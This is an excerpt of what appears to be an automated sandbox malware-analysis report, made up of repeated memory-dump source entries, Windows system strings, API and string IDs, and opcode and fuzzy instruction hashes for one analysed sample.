                                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                              • API String ID: 0-2547482624
                                                                                                                                                              Strings
                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0192A2FB
                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0192A309
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: MUI
                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: P`?wRb?w
                                                                                                                                                              • API String ID: 0-3112501033
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0
                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aullrem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3758378126-0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
• Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: gfff
                                                                                                                                                              • API String ID: 0-1553575800
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
• Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: [!
                                                                                                                                                              • API String ID: 0-1426032190
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
• Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: VUUU
                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .mui
                                                                                                                                                              • API String ID: 0-1199573805
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: EXT-
                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #
                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryName
                                                                                                                                                              • API String ID: 0-215506332
Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019A895E
Memory Dump Source
• Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
• API String ID: 0-702105204
                                                                                                                                                              • Opcode ID: b4258c0171550e8867b907b892812dcf31aa92f32df951dba2933cebe4392877
                                                                                                                                                              • Instruction ID: c432c760c7987b3d3df22dc1a1ad2777f7fddab6235a29fd4d1bf81e68c07135
                                                                                                                                                              • Opcode Fuzzy Hash: b4258c0171550e8867b907b892812dcf31aa92f32df951dba2933cebe4392877
                                                                                                                                                              • Instruction Fuzzy Hash: BE012B36600211AFE6216B59CC84E967F6AFFC6656F84042CF64D06555CB30688AC7D2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 91fa50dd458813f88d287208b0dcbd09587f1f59f9bc16c6119ec7c54017498c
                                                                                                                                                              • Instruction ID: 4379d34ad426dcd312ea5ad75b4c9f37bf09c05da31c698a803d5f5beb76aa2f
                                                                                                                                                              • Opcode Fuzzy Hash: 91fa50dd458813f88d287208b0dcbd09587f1f59f9bc16c6119ec7c54017498c
                                                                                                                                                              • Instruction Fuzzy Hash: 5B822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2c3e76bbd0bb32502e31831811fde7d84a39f168ff5afdb41113645c892d1a28
                                                                                                                                                              • Instruction ID: 4004d73cba9b4a1c3168bcdaab9653239f0d68b558f1ddf34dfa806355f9a045
                                                                                                                                                              • Opcode Fuzzy Hash: 2c3e76bbd0bb32502e31831811fde7d84a39f168ff5afdb41113645c892d1a28
                                                                                                                                                              • Instruction Fuzzy Hash: 4462B43290864A9FEF25CF18D4904AEFB7AFE51394B4AC65DC89E67604D330B944CBE1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 58f16fbc3f3e9b03b10c62942ef89dedb3c9c693e7343a6c60ca41d0a6767381
                                                                                                                                                              • Instruction ID: d0feb11da6f173f9b965ae35cb28224121ddd6ae2babd69cd904f0b1c2c68594
                                                                                                                                                              • Opcode Fuzzy Hash: 58f16fbc3f3e9b03b10c62942ef89dedb3c9c693e7343a6c60ca41d0a6767381
                                                                                                                                                              • Instruction Fuzzy Hash: D842C1356083419BE725CF68C890A6BBBE9BFC8B40F48092DFACA97250D771D945CB53
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d26341d7bc20279da7dcf5fafadf75ef868b446f3d77486afa42ee907da2f34a
                                                                                                                                                              • Instruction ID: 56a85d9fdba9999747915b4a15e4ef0ed0c2373f522eb40d7d876d57c48f8dce
                                                                                                                                                              • Opcode Fuzzy Hash: d26341d7bc20279da7dcf5fafadf75ef868b446f3d77486afa42ee907da2f34a
                                                                                                                                                              • Instruction Fuzzy Hash: B842BE71A006168FDB19CF9DC884ABEBBF6FF88715B14856DD55AAB340D730E842CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 444deaeb070e17442cbbe0d44f90f538e927224ae976b2f45f04cb3c573ad16c
                                                                                                                                                              • Instruction ID: 8b622deac799b1684996215072638d97daf9af2d359e270e99365df6a26d62f0
                                                                                                                                                              • Opcode Fuzzy Hash: 444deaeb070e17442cbbe0d44f90f538e927224ae976b2f45f04cb3c573ad16c
                                                                                                                                                              • Instruction Fuzzy Hash: E032B375E01219DBDF24DFA8D890FAEBBB5FF94714F180029E80AAB351E7359911CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: eea966165ad826f411fe4a88e09fe3217c7f2a6b1654c924ef90d49e6c6f59e2
                                                                                                                                                              • Instruction ID: 762146d8e4ec7bddb2b231500e95478fb1c93f559a9ff86dafc5386d23505d92
                                                                                                                                                              • Opcode Fuzzy Hash: eea966165ad826f411fe4a88e09fe3217c7f2a6b1654c924ef90d49e6c6f59e2
                                                                                                                                                              • Instruction Fuzzy Hash: 23425C75E102199FEB24CF69C981BEDBBF9BF88301F148099E94DAB241D7349985CF50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cf9a2615cb311457ece61da935b3d4957d1e53ba010573efca3fe1d8d2aa8a68
                                                                                                                                                              • Instruction ID: 7934d0c4b30540e5a0d983e8df1bc88ff33ac2060526a8a4bab95b429c9efc11
                                                                                                                                                              • Opcode Fuzzy Hash: cf9a2615cb311457ece61da935b3d4957d1e53ba010573efca3fe1d8d2aa8a68
                                                                                                                                                              • Instruction Fuzzy Hash: F432EC70A007558BEB25EF69C844BBEBBF6BF84705F24451DD58E9F284D735A802CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                                                                                              • Instruction ID: 7d5a6d2e9a79005cece29ffff613995e287f951329a0e26cd523f7793ff0f5b3
                                                                                                                                                              • Opcode Fuzzy Hash: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                                                                                              • Instruction Fuzzy Hash: CE22CE706046A98BEB25CF29C094776BBF5BF44B41F08885DD9CA8F286F335D452CB62
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: be34f388e0b9c88976f39f7e5b68e34f479b55b73d5ad07363e67cf49ffef44d
                                                                                                                                                              • Instruction ID: ff7eaa5236f0fc46d90d111f71bedbac26131ca0b7069b87175529294de50212
                                                                                                                                                              • Opcode Fuzzy Hash: be34f388e0b9c88976f39f7e5b68e34f479b55b73d5ad07363e67cf49ffef44d
                                                                                                                                                              • Instruction Fuzzy Hash: 7B22B035A002168FDB1ACF58C494ABEB7F6BF88305B28457DD959DB345DB30E942CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7902d3215c451bb47ad09bf951ec368adb388cfe2c33150d3fb843cfe61decd2
                                                                                                                                                              • Instruction ID: 0472fbbfae4c3202ef97bd27a0b5aa873f89f954c1f40bc411b02e8b65efc323
                                                                                                                                                              • Opcode Fuzzy Hash: 7902d3215c451bb47ad09bf951ec368adb388cfe2c33150d3fb843cfe61decd2
                                                                                                                                                              • Instruction Fuzzy Hash: BA22A475D0020A9FDF15DFACC880BAEB7B9FF84311F184569E9299B245E730EA45CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f0e872b02877bdd083c9b8065885d546f5883ffbf2697cecf6c9b2b81f00473a
                                                                                                                                                              • Instruction ID: c3eee42fb95d7d1532669d4d10d9e320636e01c6a13f327d0e313cecb8cd9b16
                                                                                                                                                              • Opcode Fuzzy Hash: f0e872b02877bdd083c9b8065885d546f5883ffbf2697cecf6c9b2b81f00473a
                                                                                                                                                              • Instruction Fuzzy Hash: 39225270E0021ADBDF15DF99C4809BEFBF6BF88715B14845AE9499B281E734ED41CBA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                              • Instruction ID: 9bd6c177da88bc170cd2800cc23164c25b069a2945d2253e5c4653c31ed379cf
                                                                                                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                              • Instruction Fuzzy Hash: 74026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d33491591c4c9c03f447b4ba9ccb5743b62ffef706a89195ef4b70e03db6ce25
                                                                                                                                                              • Instruction ID: 81184b6dc0a383aeeb928050345202c840b1ea801dbe60e72795167d95a0c8fb
                                                                                                                                                              • Opcode Fuzzy Hash: d33491591c4c9c03f447b4ba9ccb5743b62ffef706a89195ef4b70e03db6ce25
                                                                                                                                                              • Instruction Fuzzy Hash: F5F1D372E00526ABCB19CEA8C5A05BDFBF5AF54211B19426DD95EEB380D734EE40CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                              • Instruction ID: a616100f52a36a746f979ca1e6848a0b5ec3250ce09ec6b04764299017820d1d
                                                                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                              • Instruction Fuzzy Hash: 8FF18E71E0021A9BDF15DF99C590FAEBBF9BF48715F098129E949AB340E734E841CB60
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 929d75cf11c1dbb229bbdeab5bd303d0f24decc5dc725271c31c68d23b3d7a33
                                                                                                                                                              • Instruction ID: d1b9660b400b648af14a1a1af0c72b847679424ba254c3d9559464b5bde05478
                                                                                                                                                              • Opcode Fuzzy Hash: 929d75cf11c1dbb229bbdeab5bd303d0f24decc5dc725271c31c68d23b3d7a33
                                                                                                                                                              • Instruction Fuzzy Hash: 3CE116B5E002869FDB25CFACC4407FEBBF5BF44312F04C41AD58AAB281D675AA45CB52
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4e9563acaa9dfef970088d4b41ffab7c6e8c96cad85d4b7e998a8ec08abea45e
                                                                                                                                                              • Instruction ID: e46aface4fa7820c23c4a6c5a25ea5e6d1c7779c4d876516e7d65e2491d5367d
                                                                                                                                                              • Opcode Fuzzy Hash: 4e9563acaa9dfef970088d4b41ffab7c6e8c96cad85d4b7e998a8ec08abea45e
                                                                                                                                                              • Instruction Fuzzy Hash: 86D12171E0061A9BDF05CF68C981AFEB7F9AF88305F18852AD859A7241D735E901CB60
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
